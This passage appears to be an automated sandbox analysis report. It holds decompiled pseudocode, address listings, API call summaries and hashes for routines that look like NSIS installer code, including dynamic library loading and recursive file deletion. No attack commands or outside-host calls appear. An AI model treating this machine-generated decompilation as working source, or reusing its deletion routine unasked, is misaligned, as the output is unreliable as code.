                                                          					if(_t236 == 0) {
                                                          						_t185 = _t329 + 0x408; // 0x408
                                                          						_t237 = _t185;
                                                          						__eflags =  *_t237;
                                                          						if( *_t237 == 0) {
                                                          							goto L182;
                                                          						}
                                                          						_t228 = E740D12FE(_t237);
                                                          						L165:
                                                          						goto L166;
                                                          					}
                                                          					if(_t236 != 1) {
                                                          						goto L182;
                                                          					}
                                                          					_t81 = _t329 + 8; // 0x8
                                                          					_t283 = _t81;
                                                          					_t325 = E740D12FE(_t81);
                                                          					 *(_t329 + 0x808) = _t325;
                                                          					if(_t325 == 0) {
                                                          						goto L181;
                                                          					}
                                                          					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
                                                          					 *((intOrPtr*)(_t329 + 0x850)) = E740D1224(_t283);
                                                          					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
                                                          					 *((intOrPtr*)(_t329 + 0x848)) = 1;
                                                          					 *((intOrPtr*)(_t329 + 0x838)) = 1;
                                                          					_t90 = _t329 + 0x408; // 0x408
                                                          					_t228 =  *(_t325->i + E740D12FE(_t90) * 4);
                                                          					goto L165;
                                                          				}
                                                          			}



































































                                                          0x740d1aa0
                                                          0x740d1aa3
                                                          0x740d1aa6
                                                          0x740d1aa9
                                                          0x740d1aac
                                                          0x740d1aaf
                                                          0x740d1ab2
                                                          0x740d1ab4
                                                          0x740d1ab7
                                                          0x740d1aba
                                                          0x740d1abf
                                                          0x740d1ac2
                                                          0x740d1aca
                                                          0x740d1ad2
                                                          0x740d1ad4
                                                          0x740d1ad7
                                                          0x740d1adf
                                                          0x740d1adf
                                                          0x740d1ae4
                                                          0x740d1ae7
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1af1
                                                          0x740d1af3
                                                          0x740d1af8
                                                          0x740d1afa
                                                          0x740d1b8b
                                                          0x740d1b8b
                                                          0x740d1b8b
                                                          0x740d1b8f
                                                          0x740d1b92
                                                          0x740d1b94
                                                          0x740d1bb6
                                                          0x740d1bb9
                                                          0x740d1bbb
                                                          0x740d1bc4
                                                          0x740d1bca
                                                          0x740d1bcc
                                                          0x740d1bd2
                                                          0x740d1bd2
                                                          0x740d1bd8
                                                          0x740d1bdb
                                                          0x740d1bdb
                                                          0x740d1bde
                                                          0x740d1bde
                                                          0x740d1be4
                                                          0x740d1be6
                                                          0x740d1be9
                                                          0x740d1bef
                                                          0x740d1bf2
                                                          0x740d1bf2
                                                          0x740d1bf4
                                                          0x740d1bfa
                                                          0x740d1bfd
                                                          0x740d1c21
                                                          0x740d1c24
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1c27
                                                          0x740d1c29
                                                          0x740d1c37
                                                          0x740d1c3a
                                                          0x740d1c3c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1c3e
                                                          0x740d1c3e
                                                          0x740d1c3e
                                                          0x740d1c44
                                                          0x740d1c46
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1c48
                                                          0x740d1c4a
                                                          0x740d1c4c
                                                          0x740d1c4e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1c4e
                                                          0x740d1c50
                                                          0x740d1c52
                                                          0x740d1c54
                                                          0x740d1c54
                                                          0x740d1c5a
                                                          0x740d1c60
                                                          0x740d1c62
                                                          0x740d1c76
                                                          0x740d1c76
                                                          0x740d1c78
                                                          0x740d1c64
                                                          0x740d1c6a
                                                          0x740d1c6d
                                                          0x740d1c6d
                                                          0x00000000
                                                          0x740d1bff
                                                          0x740d1bff
                                                          0x740d1bff
                                                          0x740d1c00
                                                          0x740d1c08
                                                          0x740d1c0c
                                                          0x740d1c12
                                                          0x740d1c16
                                                          0x00000000
                                                          0x740d1c16
                                                          0x740d1c02
                                                          0x740d1c02
                                                          0x740d1c03
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1c05
                                                          0x740d1c06
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1c06
                                                          0x740d1b96
                                                          0x740d1b97
                                                          0x740d1ba0
                                                          0x740d1ba3
                                                          0x740d1bb0
                                                          0x740d1bb0
                                                          0x740d1ba5
                                                          0x740d1ba5
                                                          0x740d1c7e
                                                          0x740d1c81
                                                          0x740d1c84
                                                          0x740d1cf6
                                                          0x740d1cfa
                                                          0x740d1adc
                                                          0x00000000
                                                          0x740d1adc
                                                          0x00000000
                                                          0x740d1cfa
                                                          0x740d1b94
                                                          0x740d1b00
                                                          0x740d1b03
                                                          0x740d1b66
                                                          0x740d1b69
                                                          0x740d1b7a
                                                          0x740d1b7a
                                                          0x740d1b7d
                                                          0x740d1c89
                                                          0x740d1c8c
                                                          0x740d1c8c
                                                          0x740d1c8e
                                                          0x740d2033
                                                          0x740d2045
                                                          0x740d2045
                                                          0x740d2047
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2037
                                                          0x740d2038
                                                          0x740d203b
                                                          0x740d203e
                                                          0x740d20ba
                                                          0x740d20c1
                                                          0x740d20c6
                                                          0x740d20c9
                                                          0x740d1cf2
                                                          0x740d1cf2
                                                          0x740d1cf2
                                                          0x740d1cf3
                                                          0x00000000
                                                          0x740d1cf3
                                                          0x740d2040
                                                          0x740d2042
                                                          0x740d2042
                                                          0x740d2049
                                                          0x740d204b
                                                          0x740d20ae
                                                          0x740d1ce7
                                                          0x740d1cea
                                                          0x740d1ced
                                                          0x740d1cf0
                                                          0x740d1cf0
                                                          0x00000000
                                                          0x740d1cf0
                                                          0x740d204d
                                                          0x740d204f
                                                          0x740d2055
                                                          0x740d2055
                                                          0x740d2057
                                                          0x740d205a
                                                          0x740d206d
                                                          0x740d206d
                                                          0x740d2070
                                                          0x740d2073
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2075
                                                          0x740d2078
                                                          0x00000000
                                                          0x00000000
                                                          0x740d207a
                                                          0x740d2081
                                                          0x740d2081
                                                          0x740d2087
                                                          0x740d208a
                                                          0x740d20a6
                                                          0x740d208c
                                                          0x740d2095
                                                          0x740d2098
                                                          0x740d2098
                                                          0x00000000
                                                          0x740d208a
                                                          0x740d205c
                                                          0x740d205f
                                                          0x740d2062
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2064
                                                          0x00000000
                                                          0x740d2064
                                                          0x740d2051
                                                          0x740d2053
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2053
                                                          0x740d1c94
                                                          0x740d1c94
                                                          0x740d1c95
                                                          0x740d1dde
                                                          0x740d1dde
                                                          0x740d1de5
                                                          0x740d1de8
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1df5
                                                          0x00000000
                                                          0x740d1fdb
                                                          0x740d1fde
                                                          0x740d1fe1
                                                          0x740d1fe1
                                                          0x740d1fe2
                                                          0x740d1fe5
                                                          0x740d1fe7
                                                          0x740d1fe9
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1feb
                                                          0x740d1feb
                                                          0x740d1fee
                                                          0x740d2000
                                                          0x740d2003
                                                          0x740d2006
                                                          0x740d200c
                                                          0x00000000
                                                          0x740d200c
                                                          0x740d1ff0
                                                          0x740d1ff0
                                                          0x740d1ff2
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1ff4
                                                          0x740d1ff6
                                                          0x740d1ff8
                                                          0x740d1ff8
                                                          0x740d1ff8
                                                          0x740d1ff9
                                                          0x740d1ffb
                                                          0x740d1ffd
                                                          0x740d1fe1
                                                          0x740d1fe2
                                                          0x740d1fe5
                                                          0x740d1fe7
                                                          0x740d1fe9
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1fe9
                                                          0x00000000
                                                          0x740d1e3c
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1e48
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1e2f
                                                          0x740d1e33
                                                          0x740d1e37
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1fad
                                                          0x740d1fb1
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1fb7
                                                          0x740d1fbf
                                                          0x740d1fc6
                                                          0x740d1fce
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f15
                                                          0x740d1f15
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1e51
                                                          0x00000000
                                                          0x00000000
                                                          0x740d202b
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f1d
                                                          0x740d1f1f
                                                          0x740d1f1f
                                                          0x00000000
                                                          0x00000000
                                                          0x740d201b
                                                          0x00000000
                                                          0x00000000
                                                          0x740d201f
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2027
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f64
                                                          0x740d1f66
                                                          0x740d1f66
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f2f
                                                          0x740d1f31
                                                          0x740d1f31
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f41
                                                          0x740d1f43
                                                          0x740d1f43
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f72
                                                          0x740d1f74
                                                          0x740d1f74
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f4c
                                                          0x740d1f4e
                                                          0x740d1f4e
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f53
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2023
                                                          0x740d202d
                                                          0x740d202d
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f7d
                                                          0x740d1f81
                                                          0x740d1f86
                                                          0x740d1f89
                                                          0x740d1f8a
                                                          0x740d1f8d
                                                          0x740d1f93
                                                          0x740d1f93
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2013
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f57
                                                          0x740d1f57
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1e58
                                                          0x740d1e58
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f6b
                                                          0x740d1f6d
                                                          0x740d1f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1dfc
                                                          0x740d1e02
                                                          0x740d1e05
                                                          0x740d1e07
                                                          0x740d1e07
                                                          0x740d1e0a
                                                          0x740d1e0e
                                                          0x740d1e1b
                                                          0x740d1e1d
                                                          0x740d1e23
                                                          0x740d1e23
                                                          0x740d1e23
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f20
                                                          0x740d1f20
                                                          0x740d1f22
                                                          0x740d1f29
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f67
                                                          0x740d1f67
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f32
                                                          0x740d1f32
                                                          0x740d1f34
                                                          0x740d1f3b
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f44
                                                          0x740d1f44
                                                          0x740d1f46
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f75
                                                          0x740d1f75
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f4f
                                                          0x740d1f4f
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f9b
                                                          0x740d1f9f
                                                          0x740d1fa4
                                                          0x740d1fa7
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f59
                                                          0x740d1f59
                                                          0x740d1f5c
                                                          0x740d1f5e
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1f6e
                                                          0x740d1f6e
                                                          0x740d1f77
                                                          0x740d1f77
                                                          0x740d1e5a
                                                          0x740d1e5a
                                                          0x740d1e5d
                                                          0x740d1e64
                                                          0x740d1e66
                                                          0x740d1e68
                                                          0x740d1e6f
                                                          0x740d1e72
                                                          0x740d1e77
                                                          0x740d1e79
                                                          0x740d1e7b
                                                          0x740d1e7f
                                                          0x740d1e85
                                                          0x740d1e8b
                                                          0x740d1e8b
                                                          0x740d1e8d
                                                          0x740d1e8d
                                                          0x740d1e8e
                                                          0x740d1e8e
                                                          0x740d1e92
                                                          0x740d1e98
                                                          0x740d1e9a
                                                          0x740d1e9e
                                                          0x740d1ea3
                                                          0x740d1ea3
                                                          0x740d1ea5
                                                          0x740d1ea5
                                                          0x740d1ea8
                                                          0x740d1eab
                                                          0x740d1eb4
                                                          0x740d1eb7
                                                          0x740d1eba
                                                          0x740d1eba
                                                          0x740d1ebc
                                                          0x740d1ebf
                                                          0x740d1ec5
                                                          0x740d1ecb
                                                          0x740d1ecb
                                                          0x740d1ecd
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1ed3
                                                          0x740d1ed3
                                                          0x740d1ed7
                                                          0x740d1ede
                                                          0x740d1f02
                                                          0x740d1f02
                                                          0x740d1f06
                                                          0x740d1f08
                                                          0x740d1f0b
                                                          0x740d1f0b
                                                          0x740d1f0e
                                                          0x740d1f0e
                                                          0x00000000
                                                          0x740d1f06
                                                          0x740d1ee3
                                                          0x740d1ee6
                                                          0x740d1ee6
                                                          0x740d1eed
                                                          0x740d1eef
                                                          0x740d1ef2
                                                          0x740d1ef9
                                                          0x740d1efa
                                                          0x740d1f00
                                                          0x740d1f00
                                                          0x00000000
                                                          0x740d1f00
                                                          0x740d1ef4
                                                          0x740d1ef7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1ef7
                                                          0x740d1e87
                                                          0x740d1e89
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1df5
                                                          0x740d1c9b
                                                          0x740d1c9b
                                                          0x740d1c9c
                                                          0x740d1ddb
                                                          0x00000000
                                                          0x740d1ddb
                                                          0x740d1ca2
                                                          0x740d1ca3
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1ca9
                                                          0x740d1cac
                                                          0x740d1da0
                                                          0x740d1da0
                                                          0x740d1da3
                                                          0x740d1db8
                                                          0x740d1dba
                                                          0x740d1dba
                                                          0x740d1dbb
                                                          0x740d1dbe
                                                          0x740d1dc1
                                                          0x740d1dcd
                                                          0x740d1dcd
                                                          0x740d1dcd
                                                          0x740d1dc3
                                                          0x740d1dc3
                                                          0x740d1dc3
                                                          0x740d1dd3
                                                          0x00000000
                                                          0x740d1dd3
                                                          0x740d1da5
                                                          0x740d1da5
                                                          0x740d1da6
                                                          0x740d1db4
                                                          0x00000000
                                                          0x740d1db4
                                                          0x740d1da9
                                                          0x740d1daa
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1db0
                                                          0x00000000
                                                          0x740d1db0
                                                          0x740d1cb2
                                                          0x740d1d9c
                                                          0x00000000
                                                          0x740d1d9c
                                                          0x740d1cb8
                                                          0x740d1cb8
                                                          0x740d1cbb
                                                          0x740d1ce4
                                                          0x00000000
                                                          0x740d1ce4
                                                          0x740d1cbd
                                                          0x740d1cbd
                                                          0x740d1cc0
                                                          0x740d1cda
                                                          0x00000000
                                                          0x740d1cda
                                                          0x740d1cc2
                                                          0x740d1cc2
                                                          0x740d1cc5
                                                          0x740d1cd4
                                                          0x00000000
                                                          0x740d1cd4
                                                          0x740d1cc8
                                                          0x740d1cc9
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1ccb
                                                          0x00000000
                                                          0x740d1b83
                                                          0x740d1b83
                                                          0x740d1b86
                                                          0x00000000
                                                          0x740d1b86
                                                          0x740d1b7d
                                                          0x740d1b6b
                                                          0x740d1b6f
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1b71
                                                          0x740d1b74
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1b74
                                                          0x740d1b05
                                                          0x740d1b08
                                                          0x740d1b3e
                                                          0x740d1b41
                                                          0x00000000
                                                          0x740d1b47
                                                          0x740d1b49
                                                          0x740d1b4d
                                                          0x740d1b54
                                                          0x740d1b5b
                                                          0x740d1b5e
                                                          0x740d1b61
                                                          0x00000000
                                                          0x740d1b61
                                                          0x740d1b41
                                                          0x740d1b0a
                                                          0x740d1b0b
                                                          0x740d1b26
                                                          0x740d1b29
                                                          0x00000000
                                                          0x740d1b2f
                                                          0x740d1b2f
                                                          0x740d1b36
                                                          0x740d1b39
                                                          0x00000000
                                                          0x740d1b39
                                                          0x740d1b29
                                                          0x740d1b10
                                                          0x00000000
                                                          0x740d1b16
                                                          0x740d1b16
                                                          0x740d1b1d
                                                          0x00000000
                                                          0x740d1b1d
                                                          0x740d1b10
                                                          0x740d1d09
                                                          0x740d1d0e
                                                          0x740d1d13
                                                          0x740d1d17
                                                          0x740d21c6
                                                          0x740d21cc
                                                          0x740d1d29
                                                          0x740d1d2b
                                                          0x740d1d2c
                                                          0x740d20f1
                                                          0x740d20f1
                                                          0x740d20f4
                                                          0x740d20f7
                                                          0x740d2114
                                                          0x740d211a
                                                          0x740d211c
                                                          0x740d2122
                                                          0x740d2139
                                                          0x740d2139
                                                          0x740d2139
                                                          0x740d2146
                                                          0x740d214c
                                                          0x740d214f
                                                          0x740d2155
                                                          0x740d2157
                                                          0x740d215a
                                                          0x740d215c
                                                          0x740d2163
                                                          0x740d2168
                                                          0x740d216b
                                                          0x740d216d
                                                          0x740d2172
                                                          0x740d2184
                                                          0x740d2184
                                                          0x740d2172
                                                          0x740d216b
                                                          0x740d215a
                                                          0x740d218a
                                                          0x740d218d
                                                          0x740d2197
                                                          0x740d219f
                                                          0x740d21ab
                                                          0x740d21b1
                                                          0x740d21b4
                                                          0x740d20e6
                                                          0x740d20e6
                                                          0x00000000
                                                          0x740d20e6
                                                          0x740d21ba
                                                          0x740d21c0
                                                          0x740d21c0
                                                          0x00000000
                                                          0x00000000
                                                          0x740d21c2
                                                          0x740d21c2
                                                          0x740d21c2
                                                          0x740d21c2
                                                          0x00000000
                                                          0x740d218f
                                                          0x740d218f
                                                          0x740d2195
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2195
                                                          0x740d218d
                                                          0x740d2125
                                                          0x740d212b
                                                          0x740d212d
                                                          0x740d2133
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x740d2133
                                                          0x740d20f9
                                                          0x740d2100
                                                          0x740d2106
                                                          0x740d210c
                                                          0x00000000
                                                          0x740d210c
                                                          0x740d1d32
                                                          0x740d1d33
                                                          0x740d20d0
                                                          0x740d20d0
                                                          0x740d20d6
                                                          0x740d20d9
                                                          0x00000000
                                                          0x00000000
                                                          0x740d20e0
                                                          0x740d20e5
                                                          0x00000000
                                                          0x740d20e5
                                                          0x740d1d3a
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1d40
                                                          0x740d1d40
                                                          0x740d1d49
                                                          0x740d1d4e
                                                          0x740d1d54
                                                          0x00000000
                                                          0x00000000
                                                          0x740d1d5a
                                                          0x740d1d67
                                                          0x740d1d6d
                                                          0x740d1d77
                                                          0x740d1d7d
                                                          0x740d1d85
                                                          0x740d1d95
                                                          0x00000000
                                                          0x740d1d95

                                                          APIs
                                                            • Part of subcall function 740D1215: GlobalAlloc.KERNEL32(00000040,740D1233,?,740D12CF,-740D404B,740D11AB,-000000A0), ref: 740D121D
                                                          • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 740D1BC4
                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 740D1C0C
                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 740D1C16
                                                          • GlobalFree.KERNEL32 ref: 740D1C29
                                                          • GlobalFree.KERNEL32 ref: 740D1D09
                                                          • GlobalFree.KERNEL32 ref: 740D1D0E
                                                          • GlobalFree.KERNEL32 ref: 740D1D13
                                                          • GlobalFree.KERNEL32 ref: 740D1EFA
                                                          • lstrcpyA.KERNEL32(?,?), ref: 740D2098
                                                          • GetModuleHandleA.KERNELBASE(00000008), ref: 740D2114
                                                          • LoadLibraryA.KERNELBASE(00000008), ref: 740D2125
                                                          • GetProcAddress.KERNEL32(?,?), ref: 740D217E
                                                          • lstrlenA.KERNEL32(00000408), ref: 740D2198
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211149237.00000000740D1000.00000020.00020000.sdmp, Offset: 740D0000, based on PE: true
                                                          • Associated: 00000001.00000002.211137968.00000000740D0000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211158192.00000000740D3000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211175377.00000000740D5000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                          • String ID:
                                                          • API String ID: 245916457-0
                                                          • Opcode ID: feceb5591ac5619d3935a2799c8ab6b7a62610d879ca82839dad2e7cfaef41f6
                                                          • Instruction ID: 01dbc0ad41d4702f77e8493fa4bae6739e4d222e3e6fb8b5b065aeec8ba0341c
                                                          • Opcode Fuzzy Hash: feceb5591ac5619d3935a2799c8ab6b7a62610d879ca82839dad2e7cfaef41f6
                                                          • Instruction Fuzzy Hash: 0722AA71A1430ADFDB128FB589803ADBBF6FF44B14F14852ED192AA180DB745789CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				void* _v12;
                                                          				signed int _v16;
                                                          				struct _WIN32_FIND_DATAA _v336;
                                                          				signed int _t40;
                                                          				char* _t53;
                                                          				signed int _t55;
                                                          				signed int _t58;
                                                          				signed int _t64;
                                                          				signed int _t66;
                                                          				void* _t68;
                                                          				signed char _t69;
                                                          				CHAR* _t71;
                                                          				void* _t72;
                                                          				CHAR* _t73;
                                                          				char* _t76;
                                                          
                                                          				_t69 = _a8;
                                                          				_t73 = _a4;
                                                          				_v8 = _t69 & 0x00000004;
                                                          				_t40 = E00405CD3(__eflags, _t73);
                                                          				_v16 = _t40;
                                                          				if((_t69 & 0x00000008) != 0) {
                                                          					_t66 = DeleteFileA(_t73); // executed
                                                          					asm("sbb eax, eax");
                                                          					_t68 =  ~_t66 + 1;
                                                          					 *0x42f4e8 =  *0x42f4e8 + _t68;
                                                          					return _t68;
                                                          				}
                                                          				_a4 = _t69;
                                                          				_t8 =  &_a4;
                                                          				 *_t8 = _a4 & 0x00000001;
                                                          				__eflags =  *_t8;
                                                          				if( *_t8 == 0) {
                                                          					L5:
                                                          					E0040624D(0x42b8c0, _t73);
                                                          					__eflags = _a4;
                                                          					if(_a4 == 0) {
                                                          						E00405C2C(_t73);
                                                          					} else {
                                                          						lstrcatA(0x42b8c0, "\*.*");
                                                          					}
                                                          					__eflags =  *_t73;
                                                          					if( *_t73 != 0) {
                                                          						L10:
                                                          						lstrcatA(_t73, 0x40a014);
                                                          						L11:
                                                          						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                          						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
                                                          						__eflags = _t40 - 0xffffffff;
                                                          						_v12 = _t40;
                                                          						if(_t40 == 0xffffffff) {
                                                          							L29:
                                                          							__eflags = _a4;
                                                          							if(_a4 != 0) {
                                                          								_t32 = _t71 - 1;
                                                          								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                          								__eflags =  *_t32;
                                                          							}
                                                          							goto L31;
                                                          						} else {
                                                          							goto L12;
                                                          						}
                                                          						do {
                                                          							L12:
                                                          							_t76 =  &(_v336.cFileName);
                                                          							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
                                                          							__eflags =  *_t53;
                                                          							if( *_t53 != 0) {
                                                          								__eflags = _v336.cAlternateFileName;
                                                          								if(_v336.cAlternateFileName != 0) {
                                                          									_t76 =  &(_v336.cAlternateFileName);
                                                          								}
                                                          							}
                                                          							__eflags =  *_t76 - 0x2e;
                                                          							if( *_t76 != 0x2e) {
                                                          								L19:
                                                          								E0040624D(_t71, _t76);
                                                          								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                          								if(__eflags == 0) {
                                                          									_t55 = E004059CD(__eflags, _t73, _v8);
                                                          									__eflags = _t55;
                                                          									if(_t55 != 0) {
                                                          										E00405374(0xfffffff2, _t73);
                                                          									} else {
                                                          										__eflags = _v8 - _t55;
                                                          										if(_v8 == _t55) {
                                                          											 *0x42f4e8 =  *0x42f4e8 + 1;
                                                          										} else {
                                                          											E00405374(0xfffffff1, _t73);
                                                          											E0040602C(_t72, _t73, 0);
                                                          										}
                                                          									}
                                                          								} else {
                                                          									__eflags = (_a8 & 0x00000003) - 3;
                                                          									if(__eflags == 0) {
                                                          										E00405A15(__eflags, _t73, _a8);
                                                          									}
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                          							__eflags = _t64;
                                                          							if(_t64 == 0) {
                                                          								goto L27;
                                                          							}
                                                          							__eflags = _t64 - 0x2e;
                                                          							if(_t64 != 0x2e) {
                                                          								goto L19;
                                                          							}
                                                          							__eflags =  *((char*)(_t76 + 2));
                                                          							if( *((char*)(_t76 + 2)) == 0) {
                                                          								goto L27;
                                                          							}
                                                          							goto L19;
                                                          							L27:
                                                          							_t58 = FindNextFileA(_v12,  &_v336);
                                                          							__eflags = _t58;
                                                          						} while (_t58 != 0);
                                                          						_t40 = FindClose(_v12);
                                                          						goto L29;
                                                          					}
                                                          					__eflags =  *0x42b8c0 - 0x5c;
                                                          					if( *0x42b8c0 != 0x5c) {
                                                          						goto L11;
                                                          					}
                                                          					goto L10;
                                                          				} else {
                                                          					__eflags = _t40;
                                                          					if(_t40 == 0) {
                                                          						L31:
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							L39:
                                                          							return _t40;
                                                          						}
                                                          						__eflags = _v16;
                                                          						if(_v16 != 0) {
                                                          							_t40 = E004065C1(_t73);
                                                          							__eflags = _t40;
                                                          							if(_t40 == 0) {
                                                          								goto L39;
                                                          							}
                                                          							E00405BE5(_t73);
                                                          							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
                                                          							__eflags = _t40;
                                                          							if(_t40 != 0) {
                                                          								return E00405374(0xffffffe5, _t73);
                                                          							}
                                                          							__eflags = _v8;
                                                          							if(_v8 == 0) {
                                                          								goto L33;
                                                          							}
                                                          							E00405374(0xfffffff1, _t73);
                                                          							return E0040602C(_t72, _t73, 0);
                                                          						}
                                                          						L33:
                                                          						 *0x42f4e8 =  *0x42f4e8 + 1;
                                                          						return _t40;
                                                          					}
                                                          					__eflags = _t69 & 0x00000002;
                                                          					if((_t69 & 0x00000002) == 0) {
                                                          						goto L31;
                                                          					}
                                                          					goto L5;
                                                          				}
                                                          			}



















                                                          0x00405a1f
                                                          0x00405a24
                                                          0x00405a2d
                                                          0x00405a30
                                                          0x00405a38
                                                          0x00405a3b
                                                          0x00405a3e
                                                          0x00405a46
                                                          0x00405a48
                                                          0x00405a49
                                                          0x00000000
                                                          0x00405a49
                                                          0x00405a54
                                                          0x00405a57
                                                          0x00405a57
                                                          0x00405a57
                                                          0x00405a5b
                                                          0x00405a6e
                                                          0x00405a75
                                                          0x00405a7a
                                                          0x00405a7e
                                                          0x00405a8e
                                                          0x00405a80
                                                          0x00405a86
                                                          0x00405a86
                                                          0x00405a93
                                                          0x00405a96
                                                          0x00405aa1
                                                          0x00405aa7
                                                          0x00405aac
                                                          0x00405abc
                                                          0x00405abe
                                                          0x00405ac4
                                                          0x00405ac7
                                                          0x00405aca
                                                          0x00405b82
                                                          0x00405b82
                                                          0x00405b86
                                                          0x00405b88
                                                          0x00405b88
                                                          0x00405b88
                                                          0x00405b88
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405ad0
                                                          0x00405ad0
                                                          0x00405ad9
                                                          0x00405adf
                                                          0x00405ae4
                                                          0x00405ae7
                                                          0x00405ae9
                                                          0x00405aed
                                                          0x00405aef
                                                          0x00405aef
                                                          0x00405aed
                                                          0x00405af2
                                                          0x00405af5
                                                          0x00405b08
                                                          0x00405b0a
                                                          0x00405b0f
                                                          0x00405b16
                                                          0x00405b31
                                                          0x00405b36
                                                          0x00405b38
                                                          0x00405b5c
                                                          0x00405b3a
                                                          0x00405b3a
                                                          0x00405b3d
                                                          0x00405b51
                                                          0x00405b3f
                                                          0x00405b42
                                                          0x00405b4a
                                                          0x00405b4a
                                                          0x00405b3d
                                                          0x00405b18
                                                          0x00405b1e
                                                          0x00405b20
                                                          0x00405b26
                                                          0x00405b26
                                                          0x00405b20
                                                          0x00000000
                                                          0x00405b16
                                                          0x00405af7
                                                          0x00405afa
                                                          0x00405afc
                                                          0x00000000
                                                          0x00000000
                                                          0x00405afe
                                                          0x00405b00
                                                          0x00000000
                                                          0x00000000
                                                          0x00405b02
                                                          0x00405b06
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405b61
                                                          0x00405b6b
                                                          0x00405b71
                                                          0x00405b71
                                                          0x00405b7c
                                                          0x00000000
                                                          0x00405b7c
                                                          0x00405a98
                                                          0x00405a9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a5d
                                                          0x00405a5d
                                                          0x00405a5f
                                                          0x00405b8c
                                                          0x00405b8e
                                                          0x00405b91
                                                          0x00405be2
                                                          0x00405be2
                                                          0x00405be2
                                                          0x00405b93
                                                          0x00405b96
                                                          0x00405ba1
                                                          0x00405ba6
                                                          0x00405ba8
                                                          0x00000000
                                                          0x00000000
                                                          0x00405bab
                                                          0x00405bb7
                                                          0x00405bbc
                                                          0x00405bbe
                                                          0x00000000
                                                          0x00405bd9
                                                          0x00405bc0
                                                          0x00405bc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00405bc8
                                                          0x00000000
                                                          0x00405bcf
                                                          0x00405b98
                                                          0x00405b98
                                                          0x00000000
                                                          0x00405b98
                                                          0x00405a65
                                                          0x00405a68
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a68

                                                          APIs
                                                          • DeleteFileA.KERNELBASE(?,?,74B5FA90,74B5F560,00000000), ref: 00405A3E
